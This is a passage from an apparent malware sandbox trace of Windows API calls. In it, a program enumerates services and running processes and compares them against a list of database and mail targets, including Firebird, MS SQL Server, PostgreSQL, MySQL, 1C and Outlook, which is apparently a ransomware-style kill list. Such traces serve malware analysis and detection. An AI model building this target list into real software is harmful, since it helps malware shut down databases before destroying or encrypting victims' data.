	[0031.134] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0031.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0031.134] lstrlenW (lpString="DPS") returned 3
	[0031.134] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0031.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0031.134] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0031.134] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0031.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0031.134] lstrlenW (lpString="eventlog") returned 8
	[0031.134] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0031.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0031.134] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0031.134] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0031.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0031.134] lstrlenW (lpString="EventSystem") returned 11
	[0031.134] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0031.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0031.135] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0031.135] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0031.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0031.135] lstrlenW (lpString="gpsvc") returned 5
	[0031.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0031.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0031.135] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0031.135] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0031.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0031.135] lstrlenW (lpString="iphlpsvc") returned 8
	[0031.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0031.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0031.135] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0031.135] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0031.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0031.135] lstrlenW (lpString="LanmanServer") returned 12
	[0031.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0031.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0031.135] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0031.135] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0031.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0031.135] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0031.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0031.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0031.135] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0031.135] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0031.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0031.135] lstrlenW (lpString="lmhosts") returned 7
	[0031.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0031.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0031.135] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0031.135] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0031.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0031.136] lstrlenW (lpString="MMCSS") returned 5
	[0031.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0031.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0031.136] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0031.136] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0031.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0031.136] lstrlenW (lpString="MpsSvc") returned 6
	[0031.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0031.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0031.136] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0031.136] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0031.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0031.136] lstrlenW (lpString="Netman") returned 6
	[0031.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0031.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0031.136] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0031.136] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0031.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0031.136] lstrlenW (lpString="netprofm") returned 8
	[0031.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0031.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0031.136] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0031.136] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0031.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0031.136] lstrlenW (lpString="NlaSvc") returned 6
	[0031.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0031.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0031.136] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0031.136] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0031.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0031.136] lstrlenW (lpString="nsi") returned 3
	[0031.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0031.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0031.136] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0031.137] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0031.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0031.137] lstrlenW (lpString="PcaSvc") returned 6
	[0031.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0031.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0031.137] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0031.137] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0031.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0031.137] lstrlenW (lpString="PlugPlay") returned 8
	[0031.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0031.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0031.137] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0031.137] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0031.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0031.137] lstrlenW (lpString="Power") returned 5
	[0031.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0031.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0031.137] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0031.137] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0031.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0031.137] lstrlenW (lpString="ProfSvc") returned 7
	[0031.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0031.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0031.137] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0031.137] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0031.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0031.137] lstrlenW (lpString="RpcEptMapper") returned 12
	[0031.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0031.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0031.137] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0031.137] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0031.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0031.137] lstrlenW (lpString="RpcSs") returned 5
	[0031.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0031.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0031.138] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0031.138] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0031.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0031.138] lstrlenW (lpString="SamSs") returned 5
	[0031.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0031.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0031.138] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0031.138] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0031.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0031.138] lstrlenW (lpString="Schedule") returned 8
	[0031.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0031.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0031.138] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0031.138] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0031.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0031.138] lstrlenW (lpString="SENS") returned 4
	[0031.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0031.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0031.138] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0031.138] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0031.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0031.138] lstrlenW (lpString="ShellHWDetection") returned 16
	[0031.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0031.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0031.138] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0031.138] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0031.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0031.138] lstrlenW (lpString="Spooler") returned 7
	[0031.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0031.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0031.138] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0031.138] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0031.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0031.138] lstrlenW (lpString="SysMain") returned 7
	[0031.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0031.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0031.139] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0031.139] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0031.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0031.139] lstrlenW (lpString="Themes") returned 6
	[0031.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0031.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0031.139] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0031.139] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0031.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0031.139] lstrlenW (lpString="TrkWks") returned 6
	[0031.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0031.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0031.139] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0031.139] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0031.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0031.139] lstrlenW (lpString="UxSms") returned 5
	[0031.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0031.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0031.139] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0031.139] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0031.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0031.139] lstrlenW (lpString="WdiServiceHost") returned 14
	[0031.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0031.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0031.139] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0031.139] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0031.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0031.139] lstrlenW (lpString="WdiSystemHost") returned 13
	[0031.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0031.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0031.139] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0031.139] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0031.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0031.140] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0031.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0031.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0031.140] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0031.140] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0031.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0031.140] lstrlenW (lpString="Winmgmt") returned 7
	[0031.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0031.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0031.140] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0031.140] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0031.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0031.140] lstrlenW (lpString="WPDBusEnum") returned 10
	[0031.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0031.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0031.140] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0031.140] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0031.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0031.140] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e0dfd8 | out: hHeap=0x7d60000) returned 1
	[0031.140] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11c
	[0031.142] Process32FirstW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0031.143] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0031.143] lstrlenW (lpString="System") returned 6
	[0031.143] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0031.143] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0031.143] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0031.143] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0031.143] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0031.143] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0031.143] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0031.143] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0031.144] lstrlenW (lpString="smss.exe") returned 8
	[0031.144] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0031.144] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0031.144] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0031.144] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0031.144] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0031.144] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0031.144] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0031.144] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0031.145] lstrlenW (lpString="csrss.exe") returned 9
	[0031.145] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0031.145] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0031.145] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0031.145] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0031.145] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0031.145] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0031.145] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0031.145] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0031.146] lstrlenW (lpString="wininit.exe") returned 11
	[0031.146] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0031.146] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0031.146] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0031.146] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0031.146] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0031.146] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0031.146] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0031.146] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0031.147] lstrlenW (lpString="csrss.exe") returned 9
	[0031.147] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0031.147] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0031.147] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0031.147] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0031.147] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0031.147] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0031.147] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0031.147] lstrlenW (lpString="winlogon.exe") returned 12
	[0031.147] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0031.148] lstrlenW (lpString="services.exe") returned 12
	[0031.148] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0031.148] lstrlenW (lpString="lsass.exe") returned 9
	[0031.148] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0031.149] lstrlenW (lpString="lsm.exe") returned 7
	[0031.149] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0031.149] lstrlenW (lpString="svchost.exe") returned 11
	[0031.149] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0031.150] lstrlenW (lpString="svchost.exe") returned 11
	[0031.150] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0031.150] lstrlenW (lpString="svchost.exe") returned 11
	[0031.150] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0031.150] lstrlenW (lpString="svchost.exe") returned 11
	[0031.151] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0031.151] lstrlenW (lpString="svchost.exe") returned 11
	[0031.151] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0031.151] lstrlenW (lpString="audiodg.exe") returned 11
	[0031.151] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0031.152] lstrlenW (lpString="svchost.exe") returned 11
	[0031.152] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0031.152] lstrlenW (lpString="svchost.exe") returned 11
	[0031.152] Process32NextW (in: hSnapshot=0x11c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0031.153] lstrlenW (lpString="dwm.exe") returned 7
